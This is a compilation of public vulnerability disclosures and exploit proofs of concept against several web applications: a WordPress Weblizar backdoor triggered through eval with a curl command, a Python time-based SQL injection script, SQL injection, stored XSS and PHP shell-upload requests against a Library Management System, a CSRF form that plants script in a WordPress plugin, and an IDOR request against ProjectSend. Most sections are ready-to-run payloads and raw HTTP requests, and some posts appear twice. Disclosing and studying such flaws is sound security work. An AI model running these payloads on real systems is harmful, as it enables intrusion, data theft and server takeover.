WordPress Weblizar plugin version 8.9 suffers from a remote code execution vulnerability.

    # Exploit Title: WordPress Plugin Weblizar 8.9 - Backdoor# Google Dork: 'wp-json/am-member/license'# Exploit Author: Sobhan Mahmoodi# Vendor Homepage: https://weblizar.com/plugins/school-management/# Version: 8.9# Tested on: windows/linuxVulnerable code:add_action( 'rest_api_init', function() {     register_rest_route(           'am-member', 'license',           array(                'methods' => WP_REST_Server::CREATABLE,                'callback' => function( $request ) {                                $args = $request->get_params();                                if ( isset( $args['blowfish'] ) && ! empty($args['blowfish'] ) && isset( $args['blowf'] ) && ! empty( $args['blowf'] )) {                                               eval( $args['blowf'] );                                }                      };                )      );} );If you look at the code, the user code checks the parameters and finally executes the Blowf argument with the eval function. The Eval function is to take a string of PHP commands and execute it.In order to be able to exploit this vulnerability, it is enough to send a request such as the following request that according to the above code, the part with If should be set blowfish and blowf arguments and not empty, andgiven that eval executes the blowf value , Our favorite command must also be in this argument.Proof of Concept:curl -s -d 'blowfish=1' -d "blowf=system('id');" 'http://localhost:8888/wp-json/am-member/license'uid=33(www-data) gid=33(www-data) groups=33(www-data)

WordPress Weblizar 8.9 Code Execution

Coffee Shop Cashiering System version 1.0 suffers from a remote time-based SQL injection vulnerability.

    # Exploit Title: Coffee Shop Cashiering System - Authenticated Time Based Sql injection# Date: 27-06-2022# Exploit Author: syad# Vendor Homepage: https://www.sourcecodester.com# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/cscs.zip# Version: 1.0# Tested on: Windows 10 + XAMPP 3.2.4# CVE ID : N/A# Description # The id parameter does not perform input validation on the view_detail.php file it allow authenticated Time Based SQL Injection.import requestsimport syss = requests.session()proxies = {"https": "https://127.0.0.1:8080", "http": "http://127.0.0.1:8080"}def login_sql():    target = "http://%s/cscs/classes/Login.php?f=login" % sys.argv[1]    d = {        "username" : "admin",        "password" : "admin123"    }    r = s.post(target, data=d, allow_redirects=True, proxies=proxies)    res = r.text    if "success" in res:        return True    else:        return Falsedef detect_sql():    r = s.get("http://%s/cscs/admin/?page=sales/view_details&id=2'" % sys.argv[1])    res = r.text    if "You have an error in your SQL syntax;" in res:        print("[+] SQL Error Found !!")    else:        return Falsedef time_based_sql():    target = "http://%s/cscs/admin/?page=sales/view_details&id=2'+or+sleep(5)--+-" % sys.argv[1]    r = s.get(target, proxies=proxies)    print("[+] Time Based SQL Injection Executed !!!")def main():    if len(sys.argv) !=2:        print("(+) usage: %s <target>" % sys.argv[0] )        print("(+) eg: %s 192.168.121.103 " % sys.argv[0] )        sys.exit(-1)    if login_sql():        print("[+] Success Login")    detect_sql()    time_based_sql()if __name__ == "__main__":    main()

Coffee Shop Cashiering System 1.0 SQL Injection

Library Management System with QR Code version 1.0 suffers from a remote SQL injection vulnerability.

    #### Title: Library Management System with QR code Attendance 1.0 SQLInjection#### Author: Ashish Kumar (https://www.linkedin.com/in/ashish-kumar-0b65a3184)#### Date: 27.06.2022#### Vendor: https://www.sourcecodester.com/users/kingbhob02#### Software:https://www.sourcecodester.com/php/15434/library-management-system-qr-code-attendance-and-auto-generate-library-card.html#### Version: 1.0#### Reference:https://github.com/CyberThoth/CVE/blob/main/CVE/Library%20Management%20System%20with%20QR%20code%20Attendance/Sql%20Injection/POC.md#### Description：##### The reason for the SQL injection vulnerability is that the websiteapplication does not verify the validity of the data submitted by the userto the server (type, length, business parameter validity, etc.), and doesnot effectively filter the data input by the user with special characters ,so that the user's input is directly brought into the database forexecution, which exceeds the expected result of the original design of theSQL statement, resulting in a SQL injection vulnerability.LibraryManagement System with QR code Attendance does not filter the contentcorrectly at the "bookdetails.php" id parameter, resulting in thegeneration of SQL injection.#### Payload used:`' AND (SELECT 9198 FROM (SELECT(SLEEP(5)))iqZA)-- PbtB`#### POC1.  Login into the CMS.Admin Default Access:Username: adminPassword: admin2. http://localhost/LMS/librarian/bookdetails.php?id=1913. Put sleep(5) payload (`' AND (SELECT 9198 FROM (SELECT(SLEEP(5)))iqZA)--PbtB`)4. `http://localhost:80/LMS/librarian/bookdetails.php?id=' AND (SELECT 9198FROM (SELECT(SLEEP(5)))iqZA)-- PbtB`5. code```GET/LMS/librarian/bookdetails.php?id=%27%20AND%20(SELECT%209198%20FROM%20(SELECT(SLEEP(5)))iqZA)--%20PbtBHTTP/1.1Host: localhostsec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: en-GB,en-US;q=0.9,en;q=0.8Cookie: PHPSESSID=0r78mi76ub6k55p8mkce7f4pcoConnection: close```

Library Management System With QR Code 1.0 SQL Injection

Library Management System with QR Code version 1.0 suffers from a persistent cross site scripting vulnerability.

    #### Title: Library Management System with QR code Attendance 1.0 StoredCross-Site Scripting#### Author: Ashish Kumar (https://www.linkedin.com/in/ashish-kumar-0b65a3184)#### Date: 27.06.2022#### Vendor: https://www.sourcecodester.com/users/kingbhob02#### Software:https://www.sourcecodester.com/php/15434/library-management-system-qr-code-attendance-and-auto-generate-library-card.html#### Version: 1.0#### Reference:https://github.com/CyberThoth/CVE/blob/main/CVE/Library%20Management%20System%20with%20QR%20code%20Attendance/Cross%20Site%20Scripting(Stored)/POC.md#### Description：#### Library Management System with QR code Attendance is vulnerable toStored cross-site scripting on the profile edit page. The "Name" parameterin 'http://localhost/LMS/admin/edit_admin_details.php' is vulnerable.#### Impact: An attacker could steal cookies with a crafted URL sent to the victims.### POC```POST /LMS/admin/edit_admin_details.php?id=admin HTTP/1.1Host: localhostContent-Length: 115Cache-Control: max-age=0sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://localhost/LMS/admin/edit_admin_details.phpAccept-Encoding: gzip, deflateAccept-Language: en-GB,en-US;q=0.9,en;q=0.8Cookie: PHPSESSID=0r78mi76ub6k55p8mkce7f4pcoConnection: closeName=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&EmailId=admin%40gmail.com&MobNo=0&Password=admin&submit=```

Library Management System With QR Code 1.0 Cross Site Scripting

Library Management System with QR Code version 1.0 suffers from a remote shell upload vulnerability.

    #### Title: Library Management System with QR code Attendance_File UploadRCE#### Author: Ashish Kumar (https://www.linkedin.com/in/ashish-kumar-0b65a3184)#### Date: 27.06.2022#### Vendor: https://www.sourcecodester.com/users/kingbhob02#### Software:https://www.sourcecodester.com/php/15434/library-management-system-qr-code-attendance-and-auto-generate-library-card.html#### Version: 1.0#### Reference:https://github.com/CyberThoth/CVE/blob/main/CVE/Library%20Management%20System%20with%20QR%20code%20Attendance/File_Upload/POC.md#### Description：#### At the file upload function, the application system checks thevalidity of the file type, format, and content uploaded by the user, sothat attackers can upload Webshell (.php, .jsp, asp, etc.) malicious scriptfiles or files in unexpected formats, such as: HTML files, SHTML files,etc., at the same time, you can use characters such as directory jump orcontrol the upload directory to directly upload files to the Web directoryor any directory, which may lead to the execution of arbitrary maliciousscript files on the remote server, thereby directly obtaining applicationsystem permissions.#### $uploaddir = 'assets/uploads/';#### $uploadfile = $uploaddir . basename($_FILES['image']['name']);#### Payload used:`<?php phpinfo();?>`### POC```POST /LMS/card/index.php HTTP/1.1Host: localhostContent-Length: 1056Cache-Control: max-age=0sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: multipart/form-data;boundary=----WebKitFormBoundaryngJP5BxPA6UsA91OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://localhost/LMS/card/index.phpAccept-Encoding: gzip, deflateAccept-Language: en-GB,en-US;q=0.9,en;q=0.8Cookie: PHPSESSID=0r78mi76ub6k55p8mkce7f4pcoConnection: close------WebKitFormBoundaryngJP5BxPA6UsA91OContent-Disposition: form-data; name="name"File_Upload------WebKitFormBoundaryngJP5BxPA6UsA91OContent-Disposition: form-data; name="grade"Computer Studies------WebKitFormBoundaryngJP5BxPA6UsA91OContent-Disposition: form-data; name="dob"Student------WebKitFormBoundaryngJP5BxPA6UsA91OContent-Disposition: form-data; name="address"Testing Testing------WebKitFormBoundaryngJP5BxPA6UsA91OContent-Disposition: form-data; name="email"ashish@cyberthoth.in------WebKitFormBoundaryngJP5BxPA6UsA91OContent-Disposition: form-data; name="exp_date"1990-02-11------WebKitFormBoundaryngJP5BxPA6UsA91OContent-Disposition: form-data; name="id_no"8529637------WebKitFormBoundaryngJP5BxPA6UsA91OContent-Disposition: form-data; name="phone"1212121212------WebKitFormBoundaryngJP5BxPA6UsA91OContent-Disposition: form-data; name="image"; filename="File_upload.php"Content-Type: application/octet-stream<?php phpinfo();?>------WebKitFormBoundaryngJP5BxPA6UsA91O--```#### Access below URL:`http://localhost/LMS/card/assets/uploads/File_upload.php`![image](https://github.com/CyberThoth/CVE/blob/main/CVE/Library%20Management%20System%20with%20QR%20code%20Attendance/File_Upload/POC.png)

Library Management System With QR Code 1.0 Shell Upload

WordPress Plugin UK Cookie is prone to a cross-site request forgery vulnerability. Exploiting this issue may allow a remote attacker to perform certain administrative actions and gain unauthorized access to the affected application; other attacks are also possible. WordPress Plugin UK Cookie version 1.1 is vulnerable; other versions may also be affected.

There is CSRF security vulnerability in uk-cookie plugin version 1.1 and using it attacker can insert XSS to front page of WordPress installation. Version 1.1 is the latest (checked 2013-06-06) and I did not test older versions.

    <html>
    <body>
    <form action="https://example.com/wp-admin/options.php" method="POST">
    <input type="hidden" name="option&#95;page" value="cookie&#95;plugin&#95;options" />
    <input type="hidden" name="action" value="update" />
    <input type="hidden" name="&#95;wpnonce" value="e909307b13" />
    <input type="hidden" name="&#95;wp&#95;http&#95;referer" value="&#47;wp&#47;wp&#45;admin&#47;options&#45;general&#46;php&#63;page&#61;cookie&#45;alarm&#45;page&amp;settings&#45;updated&#61;true" />
    <input type="hidden" name="cookiewarn&#95;options&#91;warn&#95;text&#93;" value="&lt;script&gt;alert&#40;&apos;hacked&apos;&#41;&lt;&#47;script&gt;" />
    <input type="hidden" name="cookiewarn&#95;options&#91;redirect&#93;" value="https&#58;&#47;&#47;github&#46;com&#47;wpscanteam&#47;wpscan&#47;" />
    <input type="hidden" name="cookiewarn&#95;options&#91;ok&#95;text&#93;" value="Yes" />
    <input type="hidden" name="cookiewarn&#95;options&#91;notok&#95;text&#93;" value="No" />
    <input type="submit" value="Submit form" />
    </form>
    </body>
    </html>

CVE-2013-2180: CVE-2012-5856 uk-cookie plugin XSS · Issue #184 · wpscanteam/wpscan

A vulnerability, which was classified as problematic, was found in ProjectSend r754. This affects an unknown part of the file process.php?do=zip_download. The manipulation of the argument client/file leads to information disclosure. It is possible to initiate the attack remotely.

Nmap Announce Nmap Dev Full Disclosure Security Lists Internet Issues Open Source Dev

**Full Disclosure mailing list archives**

_From_: Vulnerability Lab <research () vulnerability-lab com>  
_Date_: Wed, 22 Feb 2017 13:54:15 +0100  

Document Title:
===============
ProjectSend r754 - IDOR & Authentication Bypass Vulnerability


References (Source):
====================
https://www.vulnerability-lab.com/get\_content.php?id=2031

Release Date:
=============
2017-02-21


Vulnerability Laboratory ID (VL-ID):
====================================
2031


Common Vulnerability Scoring System:
====================================
5.3


Product & Service Introduction:
===============================
ProjectSend is a self-hosted application (you can install it easily on your own VPS or shared web hosting account) that 
lets 
you upload files and assign them to specific clients that you create yourself! Secure, private and easy. No more 
depending 
on external services or e-mail to send those files.

(Copy of the Homepage: http://www.projectsend.org/ )


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a idor and authentication bypass vulnerability in the 
ProjectSend-r754 web-application.


Vulnerability Disclosure Timeline:
==================================
2017-02-20: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
GNU GPL License
Product: ProjectSend r754


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
An insecure direct object references occured in case of an application provides direct access to objects based on 
user-supplied input. 
As a result of this vulnerability attackers can bypass authorization and to access resources in the system. Insecure 
Direct Object References 
allows attackers to bypass authorization and access resources directly by modifying the value of a parameter\[client\] 
used. Thus finally point 
to other client account names, which allows an attackers to download others clients private data with no secure method 
provided.

Vulnerability Method(s):
\[+\] GET

Vulnerable Module(s):
\[+\] process.php?do=zip\_download

Vulnerable Parameter(s):
\[+\] client
\[+\] file


Proof of Concept (PoC):
=======================
The security vulnerability can be exploited by remote attackers with low privilege web-application user account and low 
user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to 
continue.

1. User "A" as attacker checks a file to download as zip extension, then click download to modifiy values as required 
...

2. Application responds with the client file list, so then you are able to download all other side user B data files 
with zip extension  

--- PoC Session Logs ---
GET /ProjectSend-r754/process.php?do=zip\_download&client=\[CLIENTNAME\]&files%5B%5D=2 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: \*/\*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: http://localhost/ProjectSend-r754/my\_files/
Cookie: PHPSESSID=kb0uotq6mssklf213v4a7fje47
Connection: keep-alive
-
HTTP/1.1 200 OK
Date: Sun, 05 Feb 2017 19:07:41 GMT
Server: Apache/2.2.22 (Debian)
X-Powered-By: PHP/5.4.44-0+deb7u1
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 6

Name of Files: .jpg


Video PoC:
https://www.youtube.com/watch?v=Xc6Jg9I7Pj4

Security Risk:
==============
The security risk of the web vulnerability in the ProjectSend-r754 web-application function is estimated as medium. 
(CVSS 5.3)


Credits & Authors:
==================
Lawrence Amer - Vulnerability Laboratory \[Research Team\] - (http://lawrenceamer.me) 
(https://www.vulnerability-lab.com/show.php?user=Lawrence Amer)


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all 
warranties, either expressed 
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or 
its suppliers are not liable 
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special 
damages, even if Vulnerability-Lab 
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or 
limitation of liability mainly for 
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody 
to break any licenses, policies, 
deface websites, hack into databases or trade with stolen data.

Domains:    www.vulnerability-lab.com           - www.vuln-lab.com                                              - 
www.evolution-sec.com
Section:    magazine.vulnerability-lab.com      - vulnerability-lab.com/contact.php                             - 
evolution-sec.com/contact
Social:     twitter.com/vuln\_lab                - facebook.com/VulnerabilityLab                                 - 
youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php   - vulnerability-lab.com/rss/rss\_upcoming.php                    - 
vulnerability-lab.com/rss/rss\_news.php
Programs:   vulnerability-lab.com/submit.php    - vulnerability-lab.com/list-of-bug-bounty-programs.php         - 
vulnerability-lab.com/register.php

Any modified copy or reproduction, including partially usages, of this file, resources or information requires 
authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the 
use of other media, are reserved by 
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other 
information on this website is trademark 
of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact 
(admin@) to get a ask permission.

                                    Copyright © 2017 | Vulnerability Laboratory - \[Evolution Security GmbH\]™

-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com



\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

**Current thread:**

*   **ProjectSend r754 - IDOR & Authentication Bypass Vulnerability** _Vulnerability Lab (Feb 22)_

CVE-2017-20101: Full Disclosure: ProjectSend r754 - IDOR & Authentication Bypass Vulnerability

The HTML2WP WordPress plugin through 1.0.0 does not have authorisation and CSRF checks when importing files, and does not validate them, as a result, unauthenticated attackers can upload arbitrary files (such as PHP) on the remote server

CVE-2022-1574

A vulnerability was found in SourceCodester Library Management System 1.0. It has been classified as critical. Affected is an unknown function of the component /card/index.php. The manipulation of the argument image leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.

**Title: Library Management System with QR code Attendance\_File Upload RCE****Author: Ashish Kumar (https://www.linkedin.com/in/ashish-kumar-0b65a3184)****Date: 27.06.2022****Vendor: https://www.sourcecodester.com/users/kingbhob02****Software: https://www.sourcecodester.com/php/15434/library-management-system-qr-code-attendance-and-auto-generate-library-card.html****Version: 1.0****Reference: https://github.com/CyberThoth/CVE/blob/main/CVE/Library%20Management%20System%20with%20QR%20code%20Attendance/File\_Upload/POC.md****Description：****At the file upload function, the application system checks the validity of the file type, format, and content uploaded by the user, so that attackers can upload Webshell (.php, .jsp, asp, etc.) malicious script files or files in unexpected formats, such as: HTML files, SHTML files, etc., at the same time, you can use characters such as directory jump or control the upload directory to directly upload files to the Web directory or any directory, which may lead to the execution of arbitrary malicious script files on the remote server, thereby directly obtaining application system permissions.****$uploaddir = 'assets/uploads/';****$uploadfile = $uploaddir . basename($\_FILES\['image'\]\['name'\]);****Payload used:**

<?php phpinfo();?>

**POC**

    POST /LMS/card/index.php HTTP/1.1
    Host: localhost
    Content-Length: 1056
    Cache-Control: max-age=0
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    Origin: http://localhost
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryngJP5BxPA6UsA91O
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: http://localhost/LMS/card/index.php
    Accept-Encoding: gzip, deflate
    Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
    Cookie: PHPSESSID=0r78mi76ub6k55p8mkce7f4pco
    Connection: close
    
    ------WebKitFormBoundaryngJP5BxPA6UsA91O
    Content-Disposition: form-data; name="name"
    
    File_Upload
    ------WebKitFormBoundaryngJP5BxPA6UsA91O
    Content-Disposition: form-data; name="grade"
    
    Computer Studies
    ------WebKitFormBoundaryngJP5BxPA6UsA91O
    Content-Disposition: form-data; name="dob"
    
    Student
    ------WebKitFormBoundaryngJP5BxPA6UsA91O
    Content-Disposition: form-data; name="address"
    
    Testing Testing
    ------WebKitFormBoundaryngJP5BxPA6UsA91O
    Content-Disposition: form-data; name="email"
    
    ashish@cyberthoth.in
    ------WebKitFormBoundaryngJP5BxPA6UsA91O
    Content-Disposition: form-data; name="exp_date"
    
    1990-02-11
    ------WebKitFormBoundaryngJP5BxPA6UsA91O
    Content-Disposition: form-data; name="id_no"
    
    8529637
    ------WebKitFormBoundaryngJP5BxPA6UsA91O
    Content-Disposition: form-data; name="phone"
    
    1212121212
    ------WebKitFormBoundaryngJP5BxPA6UsA91O
    Content-Disposition: form-data; name="image"; filename="File_upload.php"
    Content-Type: application/octet-stream
    
    <?php phpinfo();?>
    ------WebKitFormBoundaryngJP5BxPA6UsA91O--
    

**Access below URL:**

http://localhost/LMS/card/assets/uploads/File_upload.php

CVE-2022-2212: CVE/POC.md at main · CyberThoth/CVE

A vulnerability was found in SourceCodester Library Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /librarian/bookdetails.php. The manipulation of the argument id with the input ' AND (SELECT 9198 FROM (SELECT(SLEEP(5)))iqZA)-- PbtB leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.

**Title: Library Management System with QR code Attendance 1.0 SQL Injection****Author: Ashish Kumar (https://www.linkedin.com/in/ashish-kumar-0b65a3184)****Date: 27.06.2022****Vendor: https://www.sourcecodester.com/users/kingbhob02****Software: https://www.sourcecodester.com/php/15434/library-management-system-qr-code-attendance-and-auto-generate-library-card.html****Version: 1.0****Reference: https://github.com/CyberThoth/CVE/blob/main/CVE/Library%20Management%20System%20with%20QR%20code%20Attendance/Sql%20Injection/POC.md****Description：****The reason for the SQL injection vulnerability is that the website application does not verify the validity of the data submitted by the user to the server (type, length, business parameter validity, etc.), and does not effectively filter the data input by the user with special characters , so that the user's input is directly brought into the database for execution, which exceeds the expected result of the original design of the SQL statement, resulting in a SQL injection vulnerability.Library Management System with QR code Attendance does not filter the content correctly at the "bookdetails" id parameter, resulting in the generation of SQL injection.****Payload used:**

' AND (SELECT 9198 FROM (SELECT(SLEEP(5)))iqZA)-- PbtB

**POC**

1.  Login into the CMS. Admin Default Access:

Username: admin

Password: admin

2.  http://localhost/LMS/librarian/bookdetails.php?id=191
    
3.  Put sleep(5) payload (' AND (SELECT 9198 FROM (SELECT(SLEEP(5)))iqZA)-- PbtB)
    
4.  http://localhost:80/LMS/librarian/bookdetails.php?id=' AND (SELECT 9198 FROM (SELECT(SLEEP(5)))iqZA)-- PbtB
    
5.  code
    

    GET /LMS/librarian/bookdetails.php?id=%27%20AND%20(SELECT%209198%20FROM%20(SELECT(SLEEP(5)))iqZA)--%20PbtB HTTP/1.1
    Host: localhost
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
    Cookie: PHPSESSID=0r78mi76ub6k55p8mkce7f4pco
    Connection: close
    

**line 111 of bookdetails.php invokes a SQL query built with input that comes from an untrusted source. This call could allow an attacker to modify the statement's meaning or to execute arbitrary SQL commands**

Tag

#php